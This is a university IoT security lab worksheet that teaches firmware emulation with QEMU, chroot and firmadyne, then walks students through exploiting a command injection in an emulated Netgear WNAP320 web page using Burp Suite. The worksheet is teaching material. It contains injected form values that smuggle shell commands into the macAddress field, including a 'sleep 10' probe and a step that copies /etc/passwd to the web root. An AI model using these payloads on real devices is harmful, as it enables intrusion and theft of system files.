University of Wolverhampton School of Mathematics and Computer Science Student Number: Name: IoT Security Workshop 2 Lab Description In this lab, we will have a look at Firmware Emulation using different tools such as Qemu, Chroot and Firmware Analysis Toolkit. Firmware emulation is extremely useful as this allows us as security researchers to perform preliminary analysis without the need of having the physical device. Complete workshop 1 before attempting this one. Steps with (*) are explained in the previous workshop. Task 1, learn how to emulate a firmware: Power on your virtual machine and open a new terminal window (*)Enter into folder ~/Labs/Firmware (*)Extract the firmware tew-emu.zip in tew-emu.extracted (*)Enter the directory which contains the firmware (TEW-812DRUv2) Which is the processor architecture on which this firmware is supposed to run? (*) [MARKS] _______________________________________________________________________________________ ______________________________________________________________________________________ Do you think you can execute the command ./bin/busybox (or any other) in your VM? Why? [MARKS] _______________________________________________________________________________________ _______________________________________________________________________________________ Copy the file qemu-arm-static in the current directory cp /usr/bin/qemu-arm-static . Make the file executable chmod +x qemu-arm-static Emulate the binary busybox (password is attify123) sudo chroot . ./qemu-arm-static ./bin/busybox echo and replace with your real number Paste a screenshot to prove that the program is working as follows [MARKS] Analyse the previous command: what do you think it does? Search on the web [Marks] ______________________________________________________________________________________ _______________________________________________________________________________________ ______________________________________________________________________________________ _______________________________________________________________________________________ Use the option -g to open the command and connect it to the debugger on port 1234 sudo chroot . ./qemu-arm-static -g 1234 ./bin/busybox leave the program running without closing the terminal window. Open another terminal window and return to the firmware’s directory (TEW-812DRUv2)Start the debugger with gdb-multiarch ./bin/busybox After a few lines, you new prompt should be (gdb) Change the architecture in the debugger by typing set architecture arm Attack the debugger to the other process (busybox running in the other window) target remote localhost:1234 Set a breakpoint and continue the execution b write c Show register R1. x/s $r1 What is the register value R1? [MARKS] _______________________________________________________________________________________ _______________________________________________________________________________________ Change the string value in R1 set $r1=“your name and student id” quotes “” are mandatory and hit “c” to continue. Paste a screenshot of your output (in the original window) as follows [MARKS] Write “quit” in the debugger and press “y” to kill the target applicationWrite “exit” in both windows to close them Task 2, using firmware analysis toolkit (firmadyne): Open a new terminal window (*)Enter firmadyne folder cd tools/firmadyne What is firmadyne? Search on Google and answer [MARKS] _____________________________________________________________________ _______________________________________________________________________________________ Copy the wanted firmware into the current directory cp ../../Labs/Firmware/wnap320.zip . Start the emulation by typing ./fat.py It will ask for the name of the firmware (enter wnap320.zip)the brand (enter Netgear)if asked for password of firmadyne (enter firmadyne…if you make an error, you need to start again from the beginning)if asked for password of oit (enter attify123) Wait 60 seconds and the emulation will be complete. Do not press any key or the emulation will be stopped. Write here the ip that appeared in the console (for example 192.168.0.100): _______________________________________________________________ Open the web browser and connect to that ip You should be able to see the web admin page You are successfully able to run the firmware even without the device! Minimise the browser and open a new terminal window (DO NOT close the existing command window in order to leave the emulation running).Enter in the firmware directory which you have already extracted during workshop 1. cd Labs/Firmware/wnap320.extracted cd _rootfs.squashfs.extracted cd squashfs-root Now open the file nano home/www/boardDataWW.php Line starting with exec(“….”) is a vulnerability called COMMAND INJECTION. Search on internet and try to describe how it works. [MARKS] _______________________________________________________________________________________ _______________________________________________________________________________________ In our specific case, the firmware executes a shell command (wr_mfg_data) by concatenating a variable (macAddress) coming from the user. That is the vulnerability we are going to exploit. Close the editor by pressing CTRL+X. To exploit this vulnerability we need to connect a proxy server to our browser. Re-open the browser and go to Preferences, then Advanced and select the Network tab. Click Settings and set the HTTP proxy to 127.0.0.1:8080 as in the picture. Press Ok/Apply to close the dialogs. In the terminal, go to the tools directory and run the Burpsuite cd ~/tools java -jar burpsuite_community_v1.7.35.jar If the software wants to update itself, choose Close. Check “temporary project” and press Next Check “use Burp defaults” and press Start Burp Return to the web page and insert the url /boardDataWW.php The page will remain in “connecting” state because Burpsuite is intercepting (and holding) the request. We need to forward it by opening Burpsuite, clicking on Proxy, then Intercept and finally “Forward”. At this point the browser will receive the new page. Now insert a fake MAC, for example 123456789012 and press Submit As soon as you press Submit, the burp suite will again capture the requests (that you can see in HTTP history tab) Choose the POST request (should be the last one), right click on it and select “Send to Repeater” which will help us to resend the same request … with updated params. Click on the Repeater section. Pressing the “Go” button you can send the same request to the server. Try it. Modify the param by writing From macAddress=123456789012®info=0&writeData=Submit to macAddress=123456789012;sleep 10;®info=0&writeData=Submit And now press Go….how many seconds does the server take to answer? What’s happening? [MARKS] ____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ Now that we know the server is vulnerable, we can ask for more interesting stuff. First, let’s copy the file in the web directory by using the following param macAddress=123456789012;cp /etc/passwd .;®info=0&writeData=Submit Now, we can ask the web to give us that file by changing the URL in the browser to /passwd Press “Forward” in burb suite to allow the request. You should get the file in the response section, as follows Task 3, about firmware analysis Before moving on to other workshops covering other elements of the IoT, I ask you to write your thoughts: why do you think firmware is important from a security point of view? Did you find the introduction to how to analyse it interesting? Why? _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________
